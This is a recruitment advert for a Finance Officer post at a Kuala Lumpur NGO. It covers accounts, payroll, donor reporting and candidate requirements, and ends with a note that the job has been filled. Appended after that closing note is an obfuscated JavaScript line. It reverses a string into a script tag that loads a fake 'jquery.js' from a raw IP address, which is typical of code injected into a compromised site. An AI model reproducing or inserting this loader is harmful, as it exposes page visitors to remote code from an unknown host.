Location : Brickfields, KL
Industry : NGO
Terms : A two-year full-time contract
Salary : Up to RM 6.5k
The Finance Officer’s main role is to ensure the implementation of the finance and administrative functions effectively and efficiently in conformance with the Finance Policies and Administrative Procedures.
• Prepare and ensure the timely submission of monthly accounts, management reports and budgets for the review of the Finance and Admin Manager.
• Ensure payments and receipts are processed promptly and monthly reconciliations are performed for all bank, credit card, partners and creditors accounts.
• Maintain oversight of relevant project budgets as appropriate, and closely work with the programme officer to ensure effective utilisation of funds;
• Gather project costing data and prepare reconciliation reports for submission to donors on the specified timelines
• Coordinate payments for participants of organised meetings and for staff for meetings, seminars and field trips according to Financial Procedures.
• Monthly processing of staff payroll and all mandatory statutory contributions
• Liaise with both internal and external parties including financial institutions, bankers, statutory as well as project auditors and the company secretary.
• Supervise and lead a team of 2 -3 junior team members.
• Any other task as assigned by the Finance and Admin Manager.
• At least 5 years of related experience in handling full set of
accounts, admin & HR. Relevant working experience in NGO is desirable
but not compulsory.
• Diploma or Degree in Accountancy.
• A self-starter with the ability to work with minimum supervision.
• Proficient and skilled with accounting packages.
• Good ICT skills – accounting softwares, word, excel and powerpoint.
• Good written, verbal and presentation skills. Able to write
narrative type of reports. (fluency in English is essential)
• Excellent planning and organisational skills; is flexible and has
the ability to multi-task, prioritise and meet multiple deadlines; can
work effectively, efficiently, diplomatically and calmly in a
multi-cultural environment; and can quickly understand and optimise
new skills, processes and procedures.
• Excellent interpersonal, collaborative and team player skills, with
ability to influence and negotiate; treats people with fairness and
respect; and has a high level of integrity.
Congratulations to the lady who has secured this job, bringing with her a lot of experience as she has worked in the same industry before. Thanks to all others who have applied 🙂 document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))